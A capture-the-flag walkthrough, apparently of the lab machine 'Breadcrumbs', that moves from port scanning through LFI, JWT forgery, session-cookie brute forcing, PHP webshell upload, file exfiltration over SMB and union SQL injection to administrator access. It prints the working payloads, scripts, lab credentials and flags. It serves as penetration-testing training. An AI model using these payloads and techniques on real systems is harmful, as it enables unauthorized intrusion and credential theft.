Breadcrums

Enumeration

As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.

The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.228 -oN allPorts

-sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.
-p- scanning the entire port range, from 1 to 65535.
-T5 insane mode, it is the fastest mode of the nmap time template.
-Pn assume the host is online.
-n scan without reverse DNS resolution.
-oN save the scan result into a file, in this case the allports file.

# Nmap 7.92 scan initiated Wed Sep  7 16:10:46 2022 as: nmap -sS --min-rate 5000 -n -Pn -p- -oN allPorts 10.10.10.228
Nmap scan report for 10.10.10.228
Host is up (0.057s latency).
Not shown: 65520 closed tcp ports (reset)
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
443/tcp   open  https
445/tcp   open  microsoft-ds
3306/tcp  open  mysql
5040/tcp  open  unknown
7680/tcp  open  pando-pub
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown

# Nmap done at Wed Sep  7 16:11:01 2022 -- 1 IP address (1 host up) scanned in 15.11 seconds

Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:

nmap -sC -sV -p22,80,135,139,443,445,3306,5040,7680,49664,49665,49666,49667,49668,49669 10.10.10.228 -oN targeted

-sC performs the scan using the default set of scripts.
-sV enables version detection.
-oN save the scan result into file, in this case the targeted file.

# Nmap 7.92 scan initiated Wed Sep  7 16:12:34 2022 as: nmap -sCV -p22,80,135,139,443,445,3306,5040,7680,49664,49665,49666,49667,49668,49669 -oN targeted 10.10.10.228
Nmap scan report for 10.10.10.228
Host is up (0.050s latency).

PORT      STATE SERVICE       VERSION
22/tcp    open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey: 
|   2048 9d:d0:b8:81:55:54:ea:0f:89:b1:10:32:33:6a:a7:8f (RSA)
|   256 1f:2e:67:37:1a:b8:91:1d:5c:31:59:c7:c6:df:14:1d (ECDSA)
|_  256 30:9e:5d:12:e3:c6:b7:c6:3b:7e:1e:e7:89:7e:83:e4 (ED25519)
80/tcp    open  http          Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1h PHP/8.0.1)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/8.0.1
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-title: Library
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
443/tcp   open  ssl/http      Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1h PHP/8.0.1)
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
| tls-alpn: 
|_  http/1.1
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-title: Library
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/8.0.1
|_ssl-date: TLS randomness does not represent time
445/tcp   open  microsoft-ds?
3306/tcp  open  mysql?
5040/tcp  open  unknown
7680/tcp  open  pando-pub?
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-09-07T14:15:23
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Sep  7 16:15:35 2022 -- 1 IP address (1 host up) scanned in 181.10 seconds

It looks like there is a website on port 80.

If we click on the Check books. button, we'll see what looks like a books search tool

http://10.10.10.228/php/books.php

If search for a random character, like the s letter, it will show us books with the s character in the title.

The Book button will show some details about the book.

Let's try to list some subdirectories with wfuzz.

wfuzz -c --hc=404 -t 200 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt http://10.10.10.228/FUZZ

-c output with colors.
--hc hide responses with the specified code.
-t specify the number of concurrent connections.
-w specify a wordlist file.

********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.228/FUZZ
Total requests: 87650

=====================================================================
ID           Response   Lines    Word       Chars       Payload    
=====================================================================

000000121:   301        9 L      30 W       336 Ch      "books"
000000325:   301        9 L      30 W       334 Ch      "php" 
000000355:   301        9 L      30 W       337 Ch      "portal" 
000000535:   301        9 L      30 W       334 Ch      "css"
000000623:   301        9 L      30 W       339 Ch      "includes"
000000838:   301        9 L      30 W       333 Ch      "db"
000000940:   301        9 L      30 W       333 Ch      "js"
000001021:   301        9 L      30 W       336 Ch      "Books"
000000888:   503        11 L     44 W       401 Ch      "examples"
000001818:   403        11 L     47 W       420 Ch      "licenses"
000003297:   301        9 L      30 W       334 Ch      "PHP"
000003798:   403        9 L      30 W       301 Ch      "%20"
000005133:   301        9 L      30 W       337 Ch      "Portal"
000007067:   403        9 L      30 W       301 Ch      "*checkout*"
000008142:   301        9 L      30 W       334 Ch      "CSS" 
000009285:   301        9 L      30 W       333 Ch      "JS" 
000011188:   403        9 L      30 W       301 Ch      "phpmyadmin"
000014388:   403        9 L      30 W       301 Ch      "webalizer"

The /books directory has several .html files with the content of the books that the search tool is loading.

http://10.10.10.228/books/

Then /portal directory show a login page.

http://10.10.10.228/portal/login.php

Then /includes directory show a few .php files.

http://10.10.10.228/includes/

And the /db directory has a db.php file. Everything else has nothing interesting in it, or we are not allowd to see it.

http://10.10.10.228/db/

Let's create an account on the login page we saw on /portal.

http://10.10.10.228/portal/signup.php

Then, log in as the new user.

Now, we see a page with different sections.

Then Check tasks section shows some tasks. One of them is saying that the PHPSESSID cookie has infinite session duration.

http://10.10.10.228/portal/php/issues.php

The Order pizza button shows a popup alert.

The User management section shows a list of users with their respective role.

http://10.10.10.228/portal/

And finally, the File management button just do a redirect to the current page. We could try to enumerate subdirectories again, but this time under the /portal directory.

wfuzz -c --hc=404 -t 200 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt http://10.10.10.228/portal/FUZZ

-c output with colors.
--hc hide responses with the specified code.
-t specify the number of concurrent connections.
-w specify a wordlist file.

********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.228/portal/FUZZ
Total requests: 87650

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000150:   301        9 L      30 W       345 Ch      "uploads"
000000278:   301        9 L      30 W       344 Ch      "assets"
000000325:   301        9 L      30 W       341 Ch      "php"
000000623:   301        9 L      30 W       346 Ch      "includes"
000000838:   301        9 L      30 W       340 Ch      "db"
000001466:   301        9 L      30 W       344 Ch      "vendor"
000004744:   301        9 L      30 W       344 Ch      "Assets"

Exploitation

If we click on the File management button, I will do a redirect to the current index.php file as we saw. Let's try to bypass it. First, intercept the request with BurpSuite. Then, press right click, and press on Do intercept > Response to this request.

If we hit Forward, we'll get the response from the server, and as you can see, the code is a 302 Found. We could try to change it to 200 OK, so the redirect doesn't happen.

Press Forward again, and you'll see the Task Submission page on the browser.

http://10.10.10.228/portal/php/files.php

Let's create a simple webshell in PHP, and upload it.

nano webshell.php

<?php echo shell_exec($_REQUEST["cmd"]); ?>

If we try to upload it, it will say that only admins can upload files. We'll have to become one of the admins users, either alex, paul or jack.

Let's go back to the /php/books.php file, which took the book's data from the /books HTML files.

Let's intercept the request when we hit Book, and send it to the repeater.

If we put some wrong data in the book parameter, we'll get an error showing an absolute path. The error show how the website is trying to look for a book in the ../books directory.

Let's try to put the bookController.php file the error is showing in the book parameter with the directory path traversal pattern.

It looks like we did a Local File Inclusion attack, which allow us to read the content of the PHP files. I made a simple bash script which prints out in a nice way the content of the file that you give it.

#!/bin/bash
curl -s -X POST http://10.10.10.228/includes/bookController.php -d "book=$1&method=1" | sed 's/\\n/\n/g' | sed 's/\\r//g' | sed 's/\\"/\"/g' | sed 's/\\\//\//g'

If we execute the script giving the ../includes/bookController.php file as an argument, we'll see that the file is requiring the file ../db/db.php.

./lfi.sh ../includes/bookController.php

<?php

if($_SERVER['REQUEST_METHOD'] == "POST"){
    $out = "";
    require '../db/db.php';

    $title = "";
    $author = "";

    if($_POST['method'] == 0){
        if($_POST['title'] != ""){
            $title = "%".$_POST['title']."%";
        }
        if($_POST['author'] != ""){
            $author = "%".$_POST['author']."%";
        }
        
    
        $query = "SELECT * FROM books WHERE title LIKE ? OR author LIKE ?";
        $stmt = $con->prepare($query);
        $stmt->bind_param('ss', $title, $author);
        $stmt->execute();
        $res = $stmt->get_result();
        $out = mysqli_fetch_all($res,MYSQLI_ASSOC);
    }

    elseif($_POST['method'] == 1){
        $out = file_get_contents('../books/'.$_POST['book']);
    }

    else{
        $out = false;
    }

    echo json_encode($out);
}

Let's see the content of ../db/db.php.

<?php

$host="localhost";
$port=3306;
$user="bread";
$password="jUli901";
$dbname="bread";

$con = new mysqli($host, $user, $password, $dbname, $port) or die ('Could not connect to the database server' . mysqli_connect_error());
?>

We found some credentials. As we have to become one of the admin users, we have to get their cookies. I have two cookies, a JWT (Jason Web Token) cookie and a PHPSESSID cookie.

Note that the PHPSESSID cookie starts with my username. If we check the /portal/php/admins.php page, we'll see that paul is the only admin which is online, which means that he might be a great target to steal his cookies.

The first time we logged in, we did it with the /portal/login.php file. Let's try to see it's content.

./lfi.sh ../portal/login.php

<?php
require_once 'authController.php'; 
?>
...

As we can see at the top, it is requiring the authController.php file. Let's take a look at it.

./lfi.sh ../portal/authController.php

<?php 
require 'db/db.php';
require "cookie.php";
require "vendor/autoload.php";
use \\Firebase\\JWT\\JWT;
...
        if($valid){
            session_id(makesession($username));
            session_start();

            $secret_key = '6cb9c1a2786a483ca5e44571dcc5f3bfa298593a6376ad92185c3258acd5591e';
            $data = array();

            $payload = array(
                "data" => array(
                    "username" => $username
            ));

            $jwt = JWT::encode($payload, $secret_key, 'HS256');
...

We found the secret key that is being used to encrypt the JWT. Now we could get the JWT of paul. Go to jwt.io, copy and paste our own JWT, replace our username with paul, and add the secret key we just found to the VERIFY SIGNATURE section.

Now we need the PHPSESSID of the paul user. Note again how the authController.php file is requiring the cookie.php file. Let's see it's content.

./lfi.sh ../portal/cookie.php

<?php
/**
 * @param string $username  Username requesting session cookie
 * 
 * @return string $session_cookie Returns the generated cookie
 * 
 * @devteam
 * Please DO NOT use default PHPSESSID; our security team says they are predictable.
 * CHANGE SECOND PART OF MD5 KEY EVERY WEEK
 * */
function makesession($username){
    $max = strlen($username) - 1;
    $seed = rand(0, $max);
    $key = "s4lTy_stR1nG_".$username[$seed]."(!528./9890";
    $session_cookie = $username.md5($key);

    return $session_cookie;
}

The cookie is just a MD5 hash of a specific string with a character in between, which any character of the username. It looks like we can brute force the cookie. I made the following script, which will add each letter of paul to the string, then it will calculate the MD5 hash, and finally, it will check if the cookie is correct.

import hashlib, requests

for char in "paul":
    hash_user = hashlib.md5(f"s4lTy_stR1nG_{char}(!528./9890".encode('utf-8')).hexdigest()
    cookie = f"paul{hash_user}"
    resp = requests.get("http://10.10.10.228/portal/index.php", cookies={"PHPSESSID": str(cookie)})
    if "paul" in resp.text.lower():
        print(f"\r[+] Found cookie for paul: {cookie}")

If we execute the script, we'll get the PHPSESSID cookie of the paul user.

python cookie.py

[+] Found cookie for paul: paul47200b180ccd6835d25d034eeb6e6390

Replace the PHPSESSID cookie and the JWT cookies of the paul user on the browser.

If now we refresh the website, we'll see that we are logged in as paul.

Now we can upload the webshell successfully.

As we saw when we fuzz subdirectories on /portal, there was a /uploads directory, let's check it.

There is our webshell. The problem is that it has the .zip extension. Let's upload it again, but now intercept the request with BurpSuite.

The name of the task change, and the script put the .zip extension automatically. Let's modify it, and call it webshell.php.

If we check now the /uploads directory, we'll see our webshell with the correct extension.

Finally, we can execute commands on the victim machine.

http://10.10.10.228/portal/uploads/webshell.php?cmd=whoami

If we check the content of the current directory, we'll see the two files that we uploaded, and an the absolute path where we are executing the commands.

http://10.10.10.228/portal/uploads/webshell.php?cmd=dir

Let's see what's in a directory further back.

http://10.10.10.228/portal/uploads/webshell.php?cmd=dir C:\Users\www-data\Desktop\xampp\htdocs\portal\

The pizzaDeliveryUserData folder looks interesting.

http://10.10.10.228/portal/uploads/webshell.php?cmd=dir C:\Users\www-data\Desktop\xampp\htdocs\portal\pizzaDeliveryUserData

The juliette user is the only one that looks like is not disable. If we check the content of juliette.json file, we'll see some credentials.

http://10.10.10.228/portal/uploads/webshell.php?cmd=type C:\Users\www-data\Desktop\xampp\htdocs\portal\pizzaDeliveryUserData\juliette.json

Now we can log in into the machine as the juliette user. Then, we'll be able to grab the user flag.

sshpass -p 'jUli901./())!' ssh juliette@10.10.10.228

Microsoft Windows [Version 10.0.19041.746]
(c) 2020 Microsoft Corporation. All rights reserved.
                                                    
juliette@BREADCRUMBS C:\Users\juliette>whoami       
breadcrumbs\juliette

juliette@BREADCRUMBS C:\Users\juliette>type Desktop\user.txt
65af66921d5d45bad99bd8f8c0bf08ba

Privilege Escalation

If we check the desktop of the juliette user, we'll see the user flag, and the todo.html file.

dir \Users\juliette\Desktop

 Volume in drive C has no label.                  
 Volume Serial Number is 7C07-CD3A                
                                                  
 Directory of C:\Users\juliette\Desktop           
                                                  
01/15/2021  05:04 PM    <DIR>          .          
01/15/2021  05:04 PM    <DIR>          ..         
12/09/2020  07:27 AM               753 todo.html  
09/08/2022  12:41 PM                34 user.txt   
               2 File(s)            787 bytes     
               2 Dir(s)   5,515,169,792 bytes free

The HTML file just shows a table with pending tasks. One of them is saying that there might be some passwords in the Microsoft Store Sticky Notes application.

type \Users\juliette\Desktop\todo.html

<html>                   
<style>                  
html{                    
background:black;        
color:orange;            
}                        
table,th,td{             
border:1px solid orange; 
padding:1em;             
border-collapse:collapse;
}
</style>
<table>
        <tr>
            <th>Task</th>
            <th>Status</th>
            <th>Reason</th>
        </tr>
        <tr>
            <td>Configure firewall for port 22 and 445</td>
            <td>Not started</td>
            <td>Unauthorized access might be possible</td>
        </tr>
        <tr>
            <td>Migrate passwords from the Microsoft Store Sticky Notes application to our new password manager</td>
            <td>In progress</td>
            <td>It stores passwords in plain text</td>
        </tr>
        <tr>
            <td>Add new features to password manager</td>
            <td>Not started</td>
            <td>To get promoted, hopefully lol</td>
        </tr>
</table>

</html>

I look for the path where the Sticky Notes program is stored, and I found the C:\Users\username\AppData\Roaming\Microsoft\Sticky Notes path. But, in the machine, the Sticky Notes directory doesn't exist.

dir \Users\juliette\AppData\Roaming\Microsoft

 Volume in drive C has no label.
 Volume Serial Number is 7C07-CD3A

 Directory of C:\Users\juliette\AppData\Roaming\Microsoft

01/15/2021  05:00 PM    <DIR>          Internet Explorer
01/15/2021  05:00 PM    <DIR>          Network
03/02/2021  02:31 PM    <DIR>          Spelling
01/15/2021  04:59 PM    <DIR>          Vault
02/01/2021  04:58 AM    <DIR>          Windows
               0 File(s)              0 bytes
               5 Dir(s)   5,515,116,544 bytes free

I look for other paths where the program files could be stored, and I found the C:\Users\Username\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState backup path, which do exists on the machine.

dir \Users\juliette\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbw e\LocalState

 Volume in drive C has no label.
 Volume Serial Number is 7C07-CD3A

 Directory of C:\Users\juliette\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState

01/15/2021  05:10 PM    <DIR>          .
01/15/2021  05:10 PM    <DIR>          ..
01/15/2021  05:10 PM            20,480 15cbbc93e90a4d56bf8d9a29305b8981.storage.session
11/29/2020  04:10 AM             4,096 plum.sqlite
01/15/2021  05:10 PM            32,768 plum.sqlite-shm
01/15/2021  05:10 PM           329,632 plum.sqlite-wal
               4 File(s)        386,976 bytes
               2 Dir(s)   5,515,014,144 bytes free

We can see that the plum.sqlite-wal file is the one that weighs the most. Let's transfer it to our machine. First, set a simple SMB server on our local machine.

impacket-smbserver smbFolder $(pwd) -smb2support

Then, on the victim machine, copy the file to the smbFolder share.

copy plum.sqlite-wal \10.10.14.11\smbFolder

On our local machine, we can check that the file is a SQLite file.

file plum.sqlite-wal

plum.sqlite-wal: SQLite Write-Ahead Log, version 3007000

But, if we try to see it's content with SQLite, we get an error.

sqlite3 plum.sqlite-wal

SQLite version 3.39.2 2022-07-21 15:24:47
Enter ".help" for usage hints.
sqlite> .tables
Error: file is not a database

If we print out the readable strings of the file, we'll see some new credentials for the development user.

strings plum.sqlite-wal

...
\id=48c70e58-fcf9-475a-aea4-24ce19a9f9ec juliette: jUli901./())!
\id=fc0d8d70-055d-4870-a5de-d76943a68ea2 development: fN3)sN5Ee@g
\id=48924119-7212-4b01-9e0f-ae6d678d49b2 administrator: [MOVED]ManagedPosition=Yellow0c32c3d8-7c60-48ae-939e-798df198cfe78e814e57-9d28-4288-961c-31c806338c5b

Let's log in as the development user.

sshpass -p 'fN3)sN5Ee@g' ssh development@10.10.10.228

Microsoft Windows [Version 10.0.19041.746]
(c) 2020 Microsoft Corporation. All rights reserved.
                                                    
development@BREADCRUMBS C:\Users\development>whoami 
breadcrumbs\development

At this point, if we check the root directory, we'll see thee Development directory.

dir \

 Volume in drive C has no label.                          
 Volume Serial Number is 7C07-CD3A                        
                                                          
 Directory of C:\                                         
                                                          
01/15/2021  05:03 PM    <DIR>          Anouncements       
01/15/2021  05:03 PM    <DIR>          Development        
12/07/2019  02:14 AM    <DIR>          PerfLogs           
02/01/2021  08:50 AM    <DIR>          Program Files      
12/07/2019  02:54 AM    <DIR>          Program Files (x86)
01/17/2021  02:41 AM    <DIR>          Users              
02/01/2021  02:10 AM    <DIR>          Windows            
               0 File(s)              0 bytes             
               7 Dir(s)   5,511,622,656 bytes free

Which contains a binary called Krypter_Linux.

dir \Development

 Volume in drive C has no label.                    
 Volume Serial Number is 7C07-CD3A                  
                                                    
 Directory of C:\Development                        
                                                    
01/15/2021  05:03 PM    <DIR>          .            
01/15/2021  05:03 PM    <DIR>          ..           
11/29/2020  04:11 AM            18,312 Krypter_Linux
               1 File(s)         18,312 bytes       
               2 Dir(s)   5,511,667,712 bytes free

Let's transfer it to our machine, the same way we did it before. This time, if we check the readable strings on the binary, we'll see a URL with some HTTP parameters.

strings Krypter_Linux

...
http://passmanager.htb:1234/index.php
method=select&username=administrator&table=passwords
...

But, as we can see, port 1234 is only available locally.

netstat -nat

-n show active TCP connections.
-a show TCP and UDP listening ports.
-t displays the download status of the current connection.

Active Connections

  Proto  Local Address          Foreign Address        State           Offload State
...
  TCP    127.0.0.1:1234         0.0.0.0:0              LISTENING       InHost
...

To access the website, we'll have to do port forwarding with SSH.

sshpass -p 'jUli901./())!' ssh juliette@10.10.10.228 -L 1234:127.0.0.1:1234

-L local port forwarding is enabled.

If now we make a GET request to our local machine on port 1234, with the parameters that we saw, we'll see what looks like the AES key needed to decrypt the administrator password.

curl -s "http://127.0.0.1:1234/?method=select&username=administrator&table=passwords"

selectarray(1) {
  [0]=>
  array(1) {
    ["aes_key"]=>
    string(16) "k19D193j.<19391("
  }
}

If we change the value of the username parameter, from administrator to ', we'll get an SQL error.

curl -s "http://127.0.0.1:1234/?method=select&username='&table=passwords"

select<br />
<b>Fatal error</b>:  Uncaught TypeError: mysqli_fetch_all(): Argument #1 ($result) must be of type mysqli_result, bool given in C:\Users\Administrator\Desktop\passwordManager\htdocs\index.php:18
Stack trace:
#0 C:\Users\Administrator\Desktop\passwordManager\htdocs\index.php(18): mysqli_fetch_all(false, 1)
#1 {main}
  thrown in <b>C:\Users\Administrator\Desktop\passwordManager\htdocs\index.php</b> on line <b>18</b><br />

It looks like the application is vulnerable to SQL Injection. Let's try to check if the database has only one table.

curl -X POST "http://127.0.0.1:1234/" -d "method=select&username='union select 1 -- -&table=passwords"

selectarray(1) {
  [0]=>
  array(1) {
    ["aes_key"]=>
    string(1) "1"
  }
}

As we don't get any error, there is only one table in the current database. We could see that the database name is bread.

curl -X POST "http://127.0.0.1:1234/" -d "method=select&username='union select database()-- -&table=passwords"

selectarray(1) {
  [0]=>
  array(1) {
    ["aes_key"]=>
    string(5) "bread"
  }
}

We can see that there is one table called passwords.

curl -X POST "http://127.0.0.1:1234/" -d "method=select&username='union select table_name from information_schema.tables where table_schema='bread'-- -&table=passwords"

selectarray(1) {
  [0]=>
  array(1) {
    ["aes_key"]=>
    string(9) "passwords"
  }
}

The passwords table has the id, account, password and aes_key columns.

curl -X POST "http://127.0.0.1:1234/" -d "method=select&username='union select column_name from information_schema.columns where table_schema='bread' and table_name='passwords'-- -&table=passwords"

selectarray(4) {
  [0]=>
  array(1) {
    ["aes_key"]=>
    string(2) "id"
  }
  [1]=>
  array(1) {
    ["aes_key"]=>
    string(7) "account"
  }
  [2]=>
  array(1) {
    ["aes_key"]=>
    string(8) "password"
  }
  [3]=>
  array(1) {
    ["aes_key"]=>
    string(7) "aes_key"
  }
}

Now we can print out the values of all those columns separated by the : character.

curl -X POST "http://127.0.0.1:1234/" -d "method=select&username='union select concat(id,0x3a,account,0x3a,password,0x3a,aes_key) from bread.passwords-- -&table=passwords"

selectarray(1) {
  [0]=>
  array(1) {
    ["aes_key"]=>
    string(77) "1:Administrator:H2dFz/jNwtSTWDURot9JBhWMP6XOdmcpgqvYHG35QKw=:k19D193j.<19391("
  }
}

Now, we have the password of the Administrator user, but it is encoded in base64, and then encrypted in AES. Let's use CyberChef and try to break it. Copy and paste the password in the Input field, then find From Base64 operation, drag it to the Recipe section, and do the same with the AES Decrypt operation. Then copy the AES key that we got in the SQL Injection, and paste it in the Key field of the AES Decrypt operation, change the key encoding to UTF8, and the input type to Raw.

We can't decrypt the password yet because the IV field is missing. We could try to fill it with 0 numbers. Do it until the output message doesn't say that is expecting any more bytes, then we'll get the password for the administrator user.

Now, log in via SSH as the administrator user, and then all we have to do is reap the harvest and take the root flag.

sshpass -p 'p@ssw0rd!@#$9890./' ssh administrator@10.10.10.228

administrator@BREADCRUMBS C:\Users\Administrator>whoami
breadcrumbs\administrator

administrator@BREADCRUMBS C:\Users\Administrator>type Desktop\root.txt
a49eb77fdf06b67bc60ffc4f0850770f

Last updated 2 years ago

Was this helpful?